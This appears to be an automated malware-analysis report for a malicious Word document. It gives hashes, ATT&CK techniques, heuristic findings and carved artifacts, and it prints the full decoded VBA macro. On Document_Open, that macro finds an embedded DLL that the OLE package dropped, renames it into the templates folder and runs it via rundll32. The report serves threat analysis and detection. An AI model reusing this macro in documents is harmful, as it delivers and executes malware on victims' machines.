Office (OLE) malware analysis — malicious · c4dfdf2c32068bb3

MALICIOUS

Office (OLE)

1.15 MB Created: 2021-06-15 10:43:00 Authoring application: Microsoft Office Word First seen: 2021-06-28

MD5: 3a3bef5746571319772475408f555f64 SHA-1: 804955d49abaca0190dcdc55bbbc27bac66a619e SHA-256: c4dfdf2c32068bb31b14efdd0ced1b3ef12a719f66a0249ba8127860c3d81bd3

410 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1027 Obfuscated Files or Information T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Document_Open macro is configured to execute shell commands, specifically attempting to run 'rundll32.exe' with a DLL file named 'omsh.dll' located in the user templates path. This DLL is likely a second-stage payload. The presence of an embedded PE executable and the use of Ole10Native further indicate malicious intent.

Heuristics 13

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Ole10Native package carries executable/script file type high OFFICE_PACKAGE_RISKY_FILE

OLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
   Set vbvcx = CreateObject("Scripting.FileSystemObject")
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT

Reference to VirtualProtect API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2071 bytes
SHA-256: `273ee0c17639538fd4d438e36e6671ab1cb55ed0ca051ccccfe678d53ffd9e97`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Option Compare Text Private Declare PtrSafe Function gc Lib "shell32" _ Alias "ShellExecuteA" (ByVal hwnd As Long, _ ByVal lpOperation As String, ByVal lpFile As String, _ ByVal lpParameters As String, ByVal lpDirectory As String, _ ByVal nShowCmd As Long) As Long Dim hdv As String Private Sub Document_Open() Dim vcbc As String vcbc = Options.DefaultFilePath(wdUserTemplatesPath) If Dir(vcbc & "\omsh.dll") = "" Then Call yyy Call hdhdd If Len(hdv) > 2 Then Call nam(hdv) Dim cvzz As String cvzz = "l32" gc 0, vbNullString, _ "rundl" & cvzz, Options.DefaultFilePath(wdUserTemplatesPath) & "\omsh.dll,BJXIQKCQMOC", _ vbNullString, 1 End If End If End Sub Sub hdhdd() Dim usx usx = Options.DefaultFilePath(wdTempFilePath) Dim vbvcx As Object Set vbvcx = CreateObject("Scripting.FileSystemObject") Call Search(vbvcx.GetFolder(usx), hdv) End Sub Sub yyy() Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.TypeBackspace Selection.Copy End Sub Attribute VB_Name = "Module1" Sub nam(pafs As String) Dim uu As String uu = Options.DefaultFilePath(wdUserTemplatesPath) Name pafs As uu & "\omsh.dll" End Sub Sub Search(mds As Object, pafs As String) Dim Nedc As Object For Each Nedc In mds.SubFolders Search Nedc, pafs Next Nedc Dim Ters As Object For Each Ters In mds.Files If Ters.Name = "omh.dll" Then pafs = Ters End If Next Ters Exit Sub ErrHandle: Err.Clear End Sub
`embedded_office_0008f46e.exe`	embedded-pe	Office MZ+PE at offset 0x8F46E	619410 bytes
SHA-256: `12c3bdcd258f672f2f12804d799011ff7f37817dc372959cc161bdebb0167167`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1685234107/Ole10Native	586028 bytes
SHA-256: `d1540d6e81e2889e5c2bcc12c99de3426c9fe0a83e3f5161289d3dbb1dfcce8f`
`ole10native_00_omh.dll`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1685234107/Ole10Native; display_name=omh.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\omh.dll; temp_path=; def_file=	585728 bytes
SHA-256: `b430cb981db4b5b2dcc82c63f23a60af11db02ee35731455b3570d7d63f32bc3`

Open this report in the interactive analyzer, or submit your own file for analysis.